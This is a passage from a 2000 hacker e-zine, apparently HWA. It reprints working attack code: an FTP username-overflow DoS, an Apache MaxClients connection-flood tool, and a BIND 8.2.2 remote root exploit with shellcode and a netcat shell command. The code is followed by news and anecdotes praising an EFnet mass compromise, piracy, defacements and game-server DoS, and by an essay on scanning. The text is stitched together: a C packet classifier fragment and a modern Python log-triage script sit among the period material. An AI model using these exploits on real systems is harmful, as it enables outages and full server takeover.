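        "\xff\xff\xff\xff" "details",                       /* normal query */
        "\xff\xff\xff\xff" "rcon s3cret status",            /* sane console command */
        "\xff\xff\xff\xff" "rcon x %x%x%x%x%n",             /* format-string probe */
        "\xff\xff\xff\xff" "rcon \x90\x90\x90\x90\xeb\x03", /* binary body */
        "GET / HTTP/1.0\n",                                 /* not Half-Life at all */
    };
    unsigned char big[4 + 5 + 1000];   /* header + "rcon " + 1000 filler bytes */
    enum hl_verdict v;
    int flagged = 0;
    size_t i;
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        v = hl_classify_cstr(samples[i]);
        printf("sample %zu -> %s\n", i, hl_verdict_name(v));
        if (v > HL_RCON_OK)
            flagged++;
    }
    memcpy(big, "\xff\xff\xff\xff" "rcon ", 9);
    memset(big + 9, 'A', 1000);
    v = hl_classify(big, sizeof big);
    printf("sample %zu -> %s\n", i, hl_verdict_name(v));
    if (v > HL_RCON_OK)
        flagged++;
    return flagged;   /* 3: the format-string, binary and oversized samples */
}

int main(void)
{
    printf("%d suspicious datagram(s)\n", hl_demo());
    return 0;
}
```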
/**************************************************/ /*This proof-of-concept DoS was programmed in less*/ /*than 5 minutes (I was bored), and was programmed*/ /*from the information taken from USSR Labs white */ /*paper on TransSoft's Broker FTP Server */ /* */ /* eth0 of hwa */ /* [eth0@hwa-security.net] */ /* [http://www.hwa-security.net*/ /**************************************************/ #include #include #include #include #include #include #include #include #include struct in_addr resolv (char *name) { static struct in_addr in; unsigned long l; struct hostent *ent; if ((l = inet_addr (name)) != INADDR_NONE) { in.s_addr = l; return in; } if (!(ent = gethostbyname (name))) { in.s_addr = INADDR_NONE; return in; } return *(struct in_addr *) ent->h_addr; } main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port = 21; printf("Vulnerable systems: eth0 from HWA Broker FTP Server version 3.x Broker FTP Server version 4.x Immune systems: Broker FTP Server version 4.3.0.1 \n"); if (argc < 2) { printf ("Usage : %s [port]\n", argv[0]); exit (0); } if (argc == 3) port = atoi (argv[2]); s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (argv[1]); addr.sin_port = htons (port); connect (s, (struct sockaddr *) &addr, sizeof (addr)); write (s, "USER ", 5); for (i = 1; i <= 6002; i++) { write (s, "x", 1); } write (s, "\n", 1); read (s, &c, 1); printf("Done sending 6002 characters as the username...\n"); } @HWA 334.0 [HWA] Release: Grazer releases R2D2 dos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ /* ------------------- R2D2.c ------------------ */ /* DIGIT-LABS PRIVATE!!!! DO NOT DISTRIBUTE!!! */ /* Released thru HWA-Security.net by GRAZER */ /* Oct 21 2000 */ /* grazer@hwa-security.net */ /* ------------------- R2D2.c ------------------ */ /* This tool will open a lot of connections (TCP) * to the target and port you specify. * * I have configured it to DoS some of the * Apache webservers. 
There is a little issue in * httpd.conf, the MaxClients default value is * 150 (RedHat 6.0 / Apache1.3.6), easy to fill up. * * I have built-in some scriptkiddie protection to * avoid some stupid people will mess with this tool. * * Thanks to Scrippie for some good ideas and help. * Thank to Mixter for help and addition. * * grazer@digit-labs.org * // grazer@hwa-security.net * * http://www.digit-labs.org || http://hwa-security.net */ #include #include #include #include char server_lag[] = "GET //////////////////////////////////////////// HTTP/1.0\n"; main(int argc, char *argv[]) { int MaxClients; int Timeout = 15; int times_to_connect; int sock, i, x, s[MaxClients], port; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; if (argc<3) { printf("\nR2D2 Apache Default MaxClients DoS \n"); printf("usage : %s \n",argv[0]); printf("Times = Times to reconnect after Timeout \n"); printf(" by grazer \n"); exit(0); } times_to_connect = atoi(argv[1]); port = atoi(argv[2]); if ((he=gethostbyname(argv[1])) == NULL) { printf ("Cannot Lookup Host"); exit(0); } bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length); sin.sin_family=AF_INET; sin.sin_port=htons(port); MaxClients = 150; /* make this the victims httpd.conf MaxClient value */ for (x=0; x < times_to_connect; x++) { for (i=0;i>> ADM Bind 8.2.2-P3 <<< ripped/fucked for fbsd IRCnet #elitehackerz fucks to #!ADM remote bind 8.2.2 pre3 ported to FreeBSD by gunt3r >>> ADM Bind Rip 8.2.2-P3 <<< PRIVATE CODE -- DO NOT DISTRIBUTE -- PRIVATE greets to ADM, stran9er, holg3r bug in: bind/named/ns_req.c:req_inquery() */ /* offsets: 8.0.0 min = 0 options fake-iquery 8.2.2-P3 min = -100 8.1.1 min = 400 [ fake-iquery yes; ] */ /* Usage example: $ (./exploit 0 /bin/sh -c 'exec sh -i <&4 >&4 2>&4';cat) | nc localhost 53 Adress: 0xefbfd444 Offset: 0 sh: can't access tty; job control turned off # whoami root # */ #define QUERY_LEN 0x600 #include #include #include #include #include #include #include typedef struct { unsigned 
short int r_class; /* class number */ unsigned short int r_type; /* type number */ unsigned long int r_ttl; /* time to live */ unsigned short int r_size; /* size of data area */ char r_data[QUERY_LEN]; /* pointer to data */ } rrecord; char shellc[] = "\xEB\x4b\x5E\x33\xD2\x33\xC9\x33\xDB\x66\x8B\x04\x0E\x02" "\xC4\x88\x04\x16\x41\x41\x42\x22\xC0\x75\xF0\x02\xE4\x74\x0E\x8D\x04\x16" "\x89\x04\x1E\x43\x43\x43\x43\xEB\xE0\x90\x90\x33\xC0\x89\x04\x1E\x46\x88" "\x46\x0E\x46\x46\x46\x89\x46\x06\xB0\x3B\x8D\x4E\x10\x8B\x5E\x10\x8B\xD1" "\x8D\x76\x05\x52\x51\x53\x50\xFF\xE6\xE8\xB0\xFF\xFF\xFF\x6f\x21\x6f\x21" "\x6f\x21\xdf\x21\x6f\x21\x6f\x21\x6f\x21\xdf\x21\xdf\x21\x8B\x0F\x8B\x0F" "\x8B\x0F\xdf\x21\x8B\x0F\x02\x05\x8B\x0F\x6f\x21\x6f\x21\x6f\x21\xdf\x21"; char neshel1[] = "\x11\x11\x11\x11\x11\x11\x11\x11"; /* shellcode by */ char neshel2[] = "\x22\x22\x22\x22\x22\x22\xdf\x21"; /* stran9er 10'97 */ main(int argc, char **argv) { HEADER *h; rrecord *rr; char db[sizeof(HEADER)+sizeof(rrecord)+2]; char *buf, *ptr; unsigned char cat[]="no"; short int *buflen; unsigned long stack = 0xefbfd444, offset; int sh=1024,o,b,c,t; if ( (argc<3) || (*argv[2]!='/')) { printf ("usage %s offset /path/command [args ...] 
| netcat target 53\n",argv[0]); exit(1); } offset=atoi(argv[1]); stack+=offset; fprintf(stderr,"\nAdress: 0x%x Offset: %d\n",stack, offset); buf=db; memset(buf, 0, sizeof(db)); buflen=(short int *)buf; *buflen=htons(sizeof(db)-2); h = (HEADER *)(buf+2); h->id = rand() & 0xfff; h->opcode = IQUERY; h->ancount = htons(1); rr=(rrecord *)((char *)h+sizeof(HEADER)+1); rr->r_class= htons(C_IN); rr->r_type = htons(T_A); rr->r_ttl = htonl(31337); rr->r_size = htons(QUERY_LEN+1); ptr=rr->r_data+1; memset(ptr,0x90,QUERY_LEN); ptr[498]=0xeb; ptr[498+1]=21; /* damn: sprintf(dnbuf, "[%s]", inet_ntoa(data_inaddr((u_char *)data))); */ for(c=sh;c<=(QUERY_LEN-4);) { if ((c+4) > (QUERY_LEN-4)) stack +=4; ptr[c++] = stack & 0x000000ff; ptr[c++] = (stack & 0x0000ff00) >> 8; ptr[c++] = (stack & 0x00ff0000) >> 16; ptr[c++] = (stack & 0xff000000) >> 24; } strcpy(ptr+sh,shellc); for (b=2;b;)

Enter BernZ, a young prospective hacker who wrote to me on one of my last days in Fairbanks, and asked me to help him learn the trade. Now, I get around 500 emails a week from non-member sources, and half of them are asking me the same thing. But something was different this time. He had a style that I liked. He defined what it was he could do; I told him this was called "Social Engineering", or standard old manipulation. I could hear him grin over the email. He asked to join the group after a couple of weeks of correspondence, and I finally asked him where he was. East coast. The group was primarily a west coast operation. East coast was a good idea though; both coastal areas were the biggest expanding computer related areas on the map. So we decided that yes, he should indeed head up the East Coast movement. And so he did and is.

My job moved to Portland, Oregon, so I followed. I needed a webserver, so I moved it to its current home: http://www.aracnet.com/~gen2600

This is where our hits really began to grow. Also our international image.
Magazines started printing our address as a controversial/underground webpage. We started turning heads. Somewhere along the line someone out there (Cheyenne Software) noticed that we carried serial numbers on our page, and the real flame storm started that day. My account was frozen instantly. They froze the account to review what was really on the page and see if there were really any serial numbers, which all of you know is bigtime bad. I was facing around 2,000 counts of software piracy. The Oregon chapter of the Genocide2600 group got together that night and cracked the server, moving any evidence of the serial numbers off of the system. We got away again.

Almost 3 days later I was at work at about 10am when my pager went off and told me to call home for messages. I did. Found a message from someone only identifying themselves as "Mr. Jerkins" and that I should give him a call. I did; he said that he wanted to meet with me at my Gladstone, Oregon home and that they would like to bring me somewhere to talk. I freaked. I don't care what anyone says: if they say that the hair on the back of their necks doesn't stand on end when they get a call from the FBI, they are lying. I called an emergency meeting at my house of the Genocide2600 members from Oregon for later that night. We probably wore that recording out listening to it, trying to find out if it was indeed a joke. We finally decided, no, it wasn't a joke. So I called him back and set up a time.

They were five minutes early. Mr. Jerkins was with 4 other men dressed in suits, all smiling. They wanted to take me to some place I didn't recognize, which is no shock seeing I had only lived there 3 months. But I wasn't going to chance it. I told them I wanted to go to Burgerville down the street at GlennEcho street. Hey, I know it sounds corny, but if you have ever seen "MoHolland Falls" you would understand. We packed into a late model Ford Royal Crown Victoria and headed to the burgerhouse.
My leg was uncomfortable because of the Gerber MarkII boot knife pushing into my ankle, and my right hand was on my switchblade the entire time. They didn't say a word while we got out of the car. We walked into Burgerville and everyone behind the counter followed us with their eyes and heads. We had to look out of the norm: 4 suited guys all under 6 foot, and me, black leather jacket and jeans, and a black "Skellum" shirt that says, "Un-natural disaster, can you feel hells laughter?" and six foot tall. We sat, I ate and we talked for almost one hour. Only two of the four talked: Mr. Jerkins and someone else whose name I can't remember. As soon as they opened their mouths, I began to sweat. It seems I was dropped off at home as rapidly as they had picked me up.

I sat there at my computer, my hands shaking, dialed up and jumped into my email program, pine. I wrote all members of the Genocide2600 group, in Alaska, Washington and Oregon, and informed them I had just been offered a job. That was only a couple of months ago now, and I sit here at midnight typing away and not even wanting sleep anymore. In two weeks the Genocide2600 server goes up, the new dawn.

http://www.Genocide2600.com

-Genocide
Head of the Genocide2600 Group
*Embrace Freedom*
gen2600@aracnet.com

[EOF]

@HWA

338.0 [HWA] Nov 2000: The day efnet nearly died, The ShadowKnight and Mafiaboy crusade
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pseudo editorial by Cruciphux

EFnet was owned. Yes it was. It didn't happen quite the way it was planned, but it was a classy hack nonetheless. Over 20 oper account shells were compromised and services.us was owned. EFnet was at these hackers' mercy. The charge? ALL CHANNELS OPLESS! ALL CHANNELS MODELESS!! ALL TOPICS TO PROCLAIM FREE MAFIABOY! FREE SHADOWKNIGHT! ...
Well, it took most of the night and only 300 or so channels were taken, but services.us was indeed owned, and this hack had irc opers all across the globe SQUITting their servers like crazy trying to regain ops and channel control. Massive dosing taking place during the hack contributed to its essential "failure", and to this date EFnet has not recovered: a massive state of channel desynch effectively fscked up efnet operations for a good week or more, and some channels are still not back in the hands of their 'rightful owners'. As most people know, on EFnet it is like the great wild west, or frontier: you fight for your nick, your channels, you are packetted for dissention, and general anarchy and chaos is the order of the day.

This is not a one off event. I was privy to this deed (I had 30 mins warning) and can say that it is truly a hack worthy of some regard. A mass hack like this has not been seen in some time. Also recently (Nov 13th) spaceport.jpl.nasa.gov and other nasa boxes were compromised, resulting in several gloatfests and people ircing as ShadowKnght from the compromised box (allegedly a wingate(!)); it is at the time of this writing still unsecured and being exploited. I am told by perps of the original hack that there will be a reprise, and this time they are aiming for total EFnet control; I think they have a good chance of pulling it off.

Unfortunately this is not without some fallout. It is rumoured that HWA is under FBI investigation (#hwa-security was one of the channels that was left with ops, and we have irc opers in our wings), so there are a lot of EFNet denizens that are looking for revenge or at least to save face, not to mention the implications such a premeditated, contrived mass hack has on presumably even national security. After all, this is backbone ownage for all intents and purposes.
Anyway, the true fallout is yet to be seen. HWA does not condone this action nor has any hand in its undertaking; the people behind it just wanted us to cover the 'action'. Logs of the 'takeovers' are at the end of this story; here's some press regarding mafiaboy and shadowknight to set the scene.

Some history:

http://dailynews.yahoo.com/h/nm/20001107/wr/crime_hacker_dc_1.html

Tuesday November 7 5:38 PM ET

Calif. Man Who Hacked NASA Computers Pleads Guilty

By Dan Whitcomb

LOS ANGELES (Reuters) - A 20-year-old man who hacked into scores of U.S. government, NASA and university computers under the names ``Shadow Knight'' and ``Dark Lord'' has pleaded guilty to federal charges at a closed-door hearing, prosecutors said on Tuesday.

Jason Allen Diekman, who faces a maximum of 16 years in prison, entered his plea to U.S. District Judge Dean Pregerson on Monday, said Thom Mrozek, a spokesman for the U.S. Attorney's Office in Los Angeles.

Mrozek said the public was barred from the plea hearing for reasons that prosecutors would not disclose.

Diekman, a resident of Mission Viejo,

339.0 [IND] Arab Hackers Hit U.S. Firm for Israeli Ties
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: http://www.abcnews.go.com/sections/world/DailyNews/mideast001106_cyberwar.html

B E I R U T, Lebanon, Nov. 7

As Israelis and Palestinians exchange bullets and stones in the West Bank and Gaza, other partisans are waging a fierce war on the Internet — and drawing in the United States.

On Thursday and Friday, Arab hackers attacked the Web site of U.S. company Lucent Technologies, a company that does extensive high-tech business with Israel. The attack came just days after the F.B.I. in Washington warned the three-week old Arab-Israeli cyberwar could "spill over" into the United States.

Beirut's Daily Star newspaper reported Lucent security workers were able to repel the Arab attack before it could impact the Lucent site.
Lucent is among 13 sites listed on a Web site that encouraged Arab supporters to assault Israeli sites. The site called itself 'UNITY.'

Who Struck First?

Sources in Lebanon say an Israeli site, www.wizel.com, began the cyber war in October by listing Palestinian and Hezbollah sites in Lebanon and elsewhere. Wizel has since disappeared, apparently replaced by a group calling itself "Israel Hackers." The site encourages what it calls "the army of Israeli warriors on the 'Net" to "search and destroy all of the Arab sites on the net." It also tells its supporters that all they need is "a computer, a shell and [a sense of] revenge."

The Israeli group is targeting the Palestinian Authority site, Hezbollah's El Manar television station in Lebanon, a Jordanian portal site and Iran's Islamic Republic News Agency (IRNA) site.

Another pro-Israel Web page posts an image of Palestinian leader Yasser Arafat holding dynamite sticks. Underneath it is a cartoon of Palestinian children holding guns emblazoned with United Nations Children's Fund logos.

Arab Hackers' Work

Arab hackers claim to have recently downed the Israeli army Web site for at least five days. The army has since enlisted the U.S.-based AT&T corporation to host the site after the first downing, telecommunications sources here said.

Israeli sites recently downed include the Israeli Ministries of Defense, Immigrant Absorption, Industry and Trade, Religious affairs and the Tel Aviv stock exchange.

An Arab hacker in Beirut said, "We're expecting the battle to heat up from our side in the next few days. Our cyberwar won't stop until all of the attacked Zionist sites are destroyed."

@HWA

340.0 [HWA] HOTNEW at time of print, mass hack/dos of gaming sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Nov 8th 3:14a EST

Another ex-HWA member in shit with the law (this can only be expected of such a rapidly growing motley crew); they are wanted for DoSing several multiplayer game servers..
DOSING/PACKETTING FOR ANY REASON BY ANYONE IS VERY LAME! and HWA does NOT condone the use of DDoS tools for anything other than legitimate bandwidth testing/network stress testing.

In any case, this person, we find out, is reportedly a 15 yr old cracker who was miffed his battlenet account was pulled (for reasons unknown, packetting??); they took it upon themselves to effectively down the game network for at least 4 days, possibly disrupting service longer/more widely through incidental means.

http://www.battle.net/forums/diablo2-realmstatus/posts/ba/1.shtml

Subject: Battle.net Update
From: Battle.net Sysop
Host: Blizzard Entertainment
Date: Tue Nov 7 18:33:30

We have recently become aware of the fact that an individual, group or entity has instituted a server attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that many of our customers are having difficulty logging on to the Battle.net game service and accessing Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know that the situation is a direct result of attacks on our servers, not Battle.net stability.

The FBI and certain European law enforcement agencies have been notified, and we are working in conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and Blizzard fully intends to prosecute this individual to the fullest extent of the law. If you have any information about the individual, group or entity involved in this activity, please email hacks@blizzard.com.

Thank you for your patience. We will post updates on the status of the servers as more information is available.

http://www.infoceptor.com/newspro/comments/973662921,39533,.shtml

Blizzard Servers Attacked - Deathwing @ 0:25:21 EST

It looks like the prolonged downtime of Blizzard web servers and the problems Battle.net has experienced was not a coincidence.
The following e-mail was received directly from Blizzard:

We have recently become aware of the fact that an individual, group or entity has instituted a server attack on both Battle.net and Blizzard's web pages. The result of this illegal activity has been that many of our customers are having difficulty logging on to the Battle.net game service and accessing Blizzard web pages. We are in the midst of implementing a solution, but we wanted to let you know that the situation is a direct result of attacks on our servers, not Battle.net stability.

The FBI and certain European law enforcement agencies have been notified, and we are working in conjunction with them to identify the individual. Attacks on our servers will not be tolerated, and Blizzard fully intends to prosecute this individual to the fullest extent of the law. If you have any information about the individual, group or entity involved in this activity, please email hacks@blizzard.com

Serious stuff indeed... we certainly hope the individual will be found in the near future.

Name: FUCK BLIZZARD
E-Mail:
I HOPE THEM MATHA FUCKERS DIE! Just kiddin

Name: bewf
E-Mail:
is there an award for snitching?

Name: 3f b33 3y3 w0n7 g37 m3
E-Mail:
who says its just one person? and why lock this person(s) up, give them a job or have them help you with your problems...

Name: CaSPeR
E-Mail:
don't u wish Lol of coarse its not a joke, most of bnet splits and problems are caused by indeviduals, unfortunatly i cannot tell you who they are but i do know 8)

Name: Deathwing
E-Mail: deathwing@infoceptor.com
This is not a joke, it was sent to all fansite members via a @Blizzard e-mail adress.

Name: DrunkenGoliath
E-Mail: dave-o@telusplanet.net
How come Blizzard said on their page they had problems while upgrading? This is a bad joke.

Name: Chris
E-Mail:
You better stay quiet.
I was turned on to this story by an ex member who was apparently behind the attacks; he claims a younger kid narqed him out to the feds and that the FBI are currently in search of him.

Nov 8th 3:14a EST - Cruciphux

341.0 [IND] Paranoia Vs. Transparency And Their Effects On Internet Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Paranoia Vs. Transparency And Their Effects On Internet Security

by Mixter <* mixter@newyorkoffice.com>

(* Please use mixter@hwa-security.net to contact mixter; his mail system is experiencing problems, and mail will forward to a new address.)

Lately, reactions to non-intrusive probes and to network activity that is merely unexpected are becoming increasingly hostile, a result of the increasing number of incidents and security threats. From my perspective on security, overreactions to activities that do not cross authorization and legal boundaries are leading to a scenario where anyone acquiring basic information about a system needs to be afraid of potential consequences. Seen under a wide scope, this leads to network security no longer being transparent.

Why is a non-transparent security situation on the Internet bad? Obviously, it is a big advantage to malicious intruders, who have no legal concerns because they can conceal their identity through compromised systems, and a big disadvantage to security firms, admins and individuals who depend on a complete picture of Internet security problems to solve them. Non-malicious, beneficial large scale scans like the broadcast amplifier scanning projects are becoming harder and riskier to perform using legal resources.

Network scanning and the corresponding tools evolved out of a necessity to counter new intrusion methods after they were commonly employed by system crackers.
[1] A scanner is simply security software that automates the process of making connections to a service to determine its availability and version, which allows drawing conclusions regarding security and potential vulnerability. Scanning a host is the fastest way to identify its remote vulnerabilities, since it puts the analyst in the same perspective as an attacker, seeing all possible holes.

The cause of today's widespread security problems is that people ignore security measures that are merely common sense. Many sites exist with gaping holes because their admins just don't know any better. They don't see a threat to their small, unimportant site. This is wrong, since the Internet is a network with literally millions of potential intruders, and the majority of intruders, no matter whether kiddy or criminal, select random targets to compromise and use as their resources, which means that each site is equally at risk.

Another big problem is that many admins lack the time to investigate all potential security issues, let alone all new vulnerabilities and advisories. As it is currently a part of my work to read and evaluate all information from the most important security lists and sites, I can say it is a task that takes at least one hour each and every day, and another hour if you really want to understand everything you read.

This adds to the negative effects of information about the security of a broad range of Internet hosts not being openly available. Since it is so difficult to obtain statistical information on widespread security issues, there is little awareness of the security issues that are really important, and it is a lot harder for the average admin to determine which security issues to check and protect against with priority out of the mass of security vulnerabilities and problems that are known today. I believe the problem of networks with gaping security holes has grown larger than most people, including most security professionals, expect.
The result of a recent study by a research group was that 50% of all smaller enterprises are going to have to deal with intrusions by 2003. [2]

The problem with raising awareness of security problems is that security news, incidents, and publications of security tools and advisories only generate more awareness among people who already have a basic knowledge of security. But a lot of people responsible for Internet sites still don't have enough awareness to take the very fundamental steps to protect against intrusions. They will never seek security services themselves, either. Battling incidents and insecurity on the Internet is a question of reaching and contacting as many people of this kind as possible. In this context, large scale auditing and gathering of vulnerability information could be a viable tool for identifying and notifying these people; you could even see it as a process of mass security education.

Transparency, in this context, means the possibility of freely accessing hosts and networks in non-harmful, non-intrusive ways for the purpose of security reconnaissance, without being seen and treated as a malicious attacker. The importance of network transparency is comparable with the reasons for publishing advisories and exploits in the name of full disclosure: the process demonstrates exactly how security issues are a problem, and how they can lead to incidents.

Arguably, the recent popularity of Intrusion Detection Systems is not a bad trend. IDS capabilities can be viable for detecting and blocking intrusions when they are employed by someone with sufficient background knowledge to tell the difference between serious signs of incidents and harmless reconnaissance or false positives. But intrusion detection is not the only thing that can be relied on; it is just a part of the reactive protection measures, while assessment and scanning constitute the necessary pro-active measures.
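The distinction the paragraph above turns on, between harmless reconnaissance and a serious sign of an incident, as an added example that is not part of Mixter's paper: a small triage pass over constructed connection-log lines that ignores a single service check, only watches a multi-port sweep, and escalates a connection flood against one port (the MaxClients-style exhaustion described earlier in this issue). The log format, the thresholds and the addresses are assumptions.

```python
"""Triage connection-log events by source: harmless reconnaissance or an incident?

Added example; not code from Mixter's paper. The log format
("<ISO time> <src> <dst>:<port> <SYN|DATA>"), the thresholds and the
addresses are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime

SWEEP_PORTS = 8      # this many distinct ports from one source: a sweep, worth a look, not an incident
FLOOD_EVENTS = 20    # this many SYNs to one port ...
FLOOD_WINDOW = 30.0  # ... within this many seconds: connection flood, escalate


def parse_line(line):
    """Parse one log line into (time, src, port, kind); return None for lines that do not fit."""
    parts = line.split()
    if len(parts) != 4:
        return None
    try:
        when = datetime.fromisoformat(parts[0])
        port = int(parts[2].rsplit(":", 1)[1])
    except (ValueError, IndexError):
        return None
    return when, parts[1], port, parts[3]


def _is_flood(syn_times):
    """True if FLOOD_EVENTS SYNs (sorted times) fall inside any FLOOD_WINDOW-second span."""
    for i in range(len(syn_times) - FLOOD_EVENTS + 1):
        span = syn_times[i + FLOOD_EVENTS - 1] - syn_times[i]
        if span.total_seconds() <= FLOOD_WINDOW:
            return True
    return False


def triage(log_text):
    """Return {src: verdict}; verdict is 'ignore', 'watch' or 'escalate'."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is not None:
            by_src[event[1]].append(event)

    verdicts = {}
    for src, events in by_src.items():
        events.sort(key=lambda e: e[0])
        ports = {e[2] for e in events}
        # Resource exhaustion against one service is a real incident: escalate.
        flooded = any(
            _is_flood([e[0] for e in events if e[2] == port and e[3] == "SYN"])
            for port in ports
        )
        if flooded:
            verdicts[src] = "escalate"
        # A wide sweep is reconnaissance: record it, but it crosses no boundary.
        elif len(ports) >= SWEEP_PORTS:
            verdicts[src] = "watch"
        # A single service check looks like any other client.
        else:
            verdicts[src] = "ignore"
    return verdicts


def build_sample_log():
    """Constructed sample: one visitor, one banner-grab sweep, one connection flood, one junk line."""
    lines = [
        "2000-11-08T03:10:01 192.0.2.10 198.51.100.5:80 SYN",
        "2000-11-08T03:10:01 192.0.2.10 198.51.100.5:80 DATA",
    ]
    for i, port in enumerate([21, 22, 23, 25, 53, 79, 80, 110, 111, 143, 443, 513]):
        lines.append(f"2000-11-08T03:11:{i:02d} 192.0.2.77 198.51.100.5:{port} SYN")
    for i in range(40):  # 40 SYNs to port 80 inside ten seconds
        lines.append(f"2000-11-08T03:12:{i // 4:02d} 203.0.113.9 198.51.100.5:80 SYN")
    lines.append("malformed line that the parser must skip")
    return "\n".join(lines)


if __name__ == "__main__":
    for src, verdict in sorted(triage(build_sample_log()).items()):
        print(f"{src:15} {verdict}")
```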
And performing pro-active security measures beyond your own network is justified, considering the fact that on a public network, our own security is always threatened by the security problems of others. Without machines in all parts of the world being compromised, attackers would hardly be able to strike anonymously and cover their tracks in a meaningful way. Spoofed packet attacks, DDoS agents and trojans used for relaying connections, as well as compromise of related hosts via password sniffing, would pose a less serious threat. Eliminating this threat can only be in everyone's interest, primarily for those admins unaware of security, who have their sites compromised and unknowingly used in attacks against third parties. [3]

Of course, the toleration of any client activities on a host is always a matter of trust, a concept that I don't even want to start discussing. But the fact is, in the case of malicious intruders and "aggressive" scans, nobody has a choice of accepting them or not, since they usually come from another compromised machine, and even if not, there are hundreds of other potential attackers waiting out there for every one that you manage to track down. With links to the Internet you are part of a globally accessible network, which means the best thing to do is to turn off the services you don't want to have accessed, or to set up access controls and firewalls, which is encouraged but rarely done consistently in practice.

A situation where I see a direct justification for scanning is, for example, when doing a financial transaction over an e-commerce site. Personally, checking out the general security of a site as a consumer before submitting billing info gives me more security than any certification can. I even see this as an advantage for the company offering the service.
If they have poor security, people would stay away from them, or possibly notify them, reducing their costs by preventing incidents (and the accompanying lawsuits of customers who have fallen victim to an attack). If they have good security, people would know it and prefer their services.

Another example is the spam problem. When receiving unsolicited mass mails in annoying proportions, I think it is justified to examine the third party smtp server from which the mails were relayed to hundreds of addresses without authorization. Often, you can determine a lot of problems with such systems; they are mostly excellent examples of sites totally unaware of security. In that case, it's time to explain to the admin a bit about network security and third party responsibilities. I think if more people would do such things, or even be encouraged to do them, cybercrime laws and government regulations of IT businesses' security would eventually become superfluous.

The criminalization of scanning and of the general access of network services that some people don't like to have accessed (already, the current laws can label almost any activity on a network as intrusion, because they can be interpreted arbitrarily) will ultimately lead to a situation where companies and individuals performing scans and network surveys for security relevant data are going to have big problems, while system crackers using illegally acquired resources can effectively still probe and attack any site. The situation for full-disclosure security measures is on its way to getting worse, perhaps a lot worse, as governments try to introduce legislation like the international convention on cybercrime, which would criminalize anything from sniffing and using crypto on your own network to the possession and development of security tools, let alone remote network activities.
Without calling this trend an evil government conspiracy, you can safely say that people working to advance such legislation are not acting in the best interest of security and e-commerce, not solely out of stupidity or lack of knowledge, but because there are lots of people getting advantages out of criminalizing benevolent security practice: think of new government jobs, legal powers over the security industry, and the possibilities for domestic surveillance. If the government and the security community decide that consumers and users on the Internet, who are directly affected by the security of their peers, should not have the right to scan, then their only recourse will be legal.

[1] An example of this trend is the popular paper "Improving the Security of Your Site by Breaking Into it", along with the development of the first widely-used security scanner, SATAN. http://wzv.win.tue.nl/satan/demo/docs/admin_guide_to_cracking.html

[2] See: http://www.newsbytes.com/pubNews/00/156531.html

[3] Legal liability for compromised systems that unknowingly participate in incidents, such as DDoS attacks, may be enforced more strictly soon: http://www.infoworld.com/articles/hn/xml/00/09/29/000929hnddosliability.xml

_______________________________________________________________________________
Security Papers - mixter.warrior2k.com/papers.html - mixter.void.ru/papers.html

@HWA

342.0 [IND] Trouble in the Holy land, Cyberwar and the Israeli Underground's Press Release.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Press: http://www.thestandard.com/article/article_print/0,1153,20087,00.html
Back: http://www.thestandard.com/article/display/0,1151,20087,00.html

November 09, 2000

A Hacker With a Cause

Mikael Bouzaglo's cracking exploits on anti-Israeli sites are bringing him fame – and helping to spur a stinging counterattack by pro-Palestinian hackers.
By Avi Machlis

JERUSALEM – Mikael Bouzaglo talks like a soldier in the thick of crossfire as he recalls the battles waged from his computer. A former firefighter in the Israeli army, Bouzaglo was discharged in September. But he has kept up a campaign of hacking into anti-Israeli Web sites that he was engaged in for several years.

Last month, as violent clashes between Israel and Palestinians escalated throughout the West Bank and Gaza Strip, Bouzaglo launched his most ambitious offensive yet. Bouzaglo set out to humiliate Hezbollah, the Lebanese guerrilla movement in solidarity with the Palestinian cause. He stocked up on pizza and cola and sat down at his keyboard. He encountered surprisingly tough fortifications around the Hezbollah computer systems. After 19 hours, Bouzaglo said, he finally outwitted them and wrested control of a mirror site at Hizballa.org. Then, as if conquering a hill after a bloody battle, Bouzaglo planted on the site an Israeli flag and an audio file that played the Jewish state's national anthem.

"It was harder to penetrate than I expected," he says. "The Arabs are not bad in this virtual war."

Arab retaliation came hard and fast to this and other Israeli assaults on the Web. In a series of computer attacks known in technical circles as "distributed denial of service" attacks, Arab hackers knocked down official sites of Israel's foreign ministry and the Knesset, or parliament, by striking servers at Netvision, a leading Israeli Internet service provider. In a separate attack, for which a secretive Arab hacker nicknamed "m0nk3y of Arab" claimed responsibility, Netvision's mail servers were hobbled for about a day.

As the virtual war intensified and attracted increasing interest from the local and international media, Bouzaglo was torn. His instincts warned him not to go public. Hackers around the world operate in the shadows of cyberspace and almost never show their faces.
